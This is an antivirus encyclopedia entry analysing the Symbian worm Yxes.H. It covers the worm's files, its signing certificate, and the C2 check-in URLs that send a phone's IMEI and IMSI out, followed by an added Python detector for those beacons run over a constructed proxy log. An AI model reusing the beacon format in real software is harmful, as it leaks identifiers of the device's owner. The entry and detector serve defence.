SymbOS/Yxes.H!worm

Alias/es: Worm.SymbOS.Yxe.e (KAV)
Release Date: Mar 01, 2010
Detection Availability:
                 Active Database    Extended Database
  FortiGate      low                high
  FortiClient
  FortiMail      N/A
Current Antivirus Definition Database Version: 12.196
Description

Visible Symptoms

The repeated attempts by the worm to send SMS messages may yield:
  • abnormally high bill
  • rapid battery power loss
Presence of the following files:
  • c:\sys\bin\LanPackage.exe
  • c:\sys\bin\Installer_SV.exe

Detailed Analysis

SymbOS/Yxes.H!worm is classified as a Symbian worm. It is a variant of SymbOS/Yxes.E!worm, with which it shares several functionalities (e.g. killing some applications, gathering information on the phone, sending SMS messages). The differences from SymbOS/Yxes.E!worm are:
  • The malware is named 'System Enhancement' and is known to be packaged as LanPackage.sisx.
  • The malware is signed:
    Serial Number:
                ce:3d:00:01:00:23:4e:70:a5:52:ce:e8:28:d3
    ...
    Subject: C=CN, ST=BJ, L=Beijing, O=Beijing GuoShengMingDao Technology Co. Ltd., 
    OU=LanPackage_1  2.0.0, OU=Symbian Signed ContentID, 
    CN=Beijing GuoShengMingDao Technology Co. Ltd.
    
    but the signature's certificate is already revoked:
    Serial Number: CE3D000100234E70A552CEE828D3
            Revocation Date: Sep  8 13:43:34 2009 GMT
    
  • It contacts two new Java Server Pages on the malicious remote server, named Jump.jsp and KernelPara.jsp:
    http://{REMOVED}/Jump.jsp?Version=2.0&PhoneType={TYPE}&PhoneImei={IMEI}&PhoneImsi={IMSI}&Source={SOURCE}
    http://{REMOVED}/Kernel.jsp?Version=2.0&PhoneType={TYPE}&PhoneImei={IMEI}&PhoneImsi={IMSI}&Source={SOURCE}
    http://{REMOVED}/KernelPara.jsp?Version=2.0&PhoneType={TYPE}&PhoneImei={IMEI}&PhoneImsi={IMSI}&Source={SOURCE}
    

Additionally, the malware creates/uses the following files:
  • C:\sys\bin\Installer_SV.exe: program that installs the malware correctly.
  • C:\sys\bin\LanPackage.exe: main malicious server
  • C:\system\data\SisInfo.cfg: configuration file used by the installer.
  • C:\system\data\Source.ini: written by the installer.
  • C:\System\Data\NotPure.txt
  • C:\system\data\Remote_Para.txt
  • C:\system\data\Local_Para.txt
  • C:\private\20028B98\SisInfo.cfg: copy of system data SisInfo.cfg
  • C:\private\20028B98\Source.ini: copy of system data Source.ini
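As an added defender-side example (not part of Fortinet's entry), the Python below flags proxy log lines whose URL matches the check-in format listed above (Jump.jsp / Kernel.jsp / KernelPara.jsp with the Version, PhoneType, PhoneImei, PhoneImsi and Source fields) and shows that the two spellings of the revoked certificate's serial number on this page denote the same value; the host name, IMEI/IMSI values and log layout are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints and query fields taken from the analysis above. The real server host is
# not on the page ({REMOVED}), so matching is done on path and query fields only.
YXES_ENDPOINTS = {"/Jump.jsp", "/Kernel.jsp", "/KernelPara.jsp"}
YXES_PARAMS = {"Version", "PhoneType", "PhoneImei", "PhoneImsi", "Source"}

def match_yxes_beacon(url):
    """Return the beacon's fields if url matches the Yxes.H check-in pattern, else None."""
    parts = urlsplit(url)
    if parts.path not in YXES_ENDPOINTS:
        return None
    qs = parse_qs(parts.query)
    if not YXES_PARAMS <= set(qs):          # all five fields must be present
        return None
    return {
        "endpoint": parts.path.lstrip("/"),
        "version": qs["Version"][0],
        "phone_type": qs["PhoneType"][0],
        "imei": qs["PhoneImei"][0],
        "imsi": qs["PhoneImsi"][0],
    }

def scan_proxy_log(lines):
    """Return [(line_no, fields)] for every log line carrying a matching URL."""
    hits = []
    for n, line in enumerate(lines, 1):
        for token in line.split():
            if token.startswith(("http://", "https://")):
                fields = match_yxes_beacon(token)
                if fields:
                    hits.append((n, fields))
    return hits

def normalize_serial(serial):
    """Canonicalize an X.509 serial so 'ce:3d:00:...' and 'CE3D00...' compare equal."""
    return re.sub(r"[^0-9a-f]", "", serial.lower())

# Constructed sample proxy log (hypothetical host, IMEI and IMSI; not from the page).
SAMPLE_LOG = [
    "2010-03-01T10:15:02 10.0.0.7 GET http://c2.example.invalid/Jump.jsp?Version=2.0&PhoneType=N95&PhoneImei=356938035643809&PhoneImsi=460001234567890&Source=1 200",
    "2010-03-01T10:15:03 10.0.0.7 GET http://c2.example.invalid/index.html 200",
    "2010-03-01T10:15:09 10.0.0.7 GET http://c2.example.invalid/KernelPara.jsp?Version=2.0&PhoneType=N95&PhoneImei=356938035643809&PhoneImsi=460001234567890&Source=1 200",
    "2010-03-01T10:16:00 10.0.0.9 GET http://other.example.invalid/Jump.jsp?Version=2.0 200",
]

if __name__ == "__main__":
    for n, f in scan_proxy_log(SAMPLE_LOG):
        print(f"line {n}: {f['endpoint']} beacon, IMEI {f['imei']}, IMSI {f['imsi']}")
```

Line 4 of the sample is deliberately incomplete (only Version) and is not flagged, so a partial path match alone does not trigger the rule.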

Description Last Updated Date: Mar 02, 2010
Reference: ID - 1599341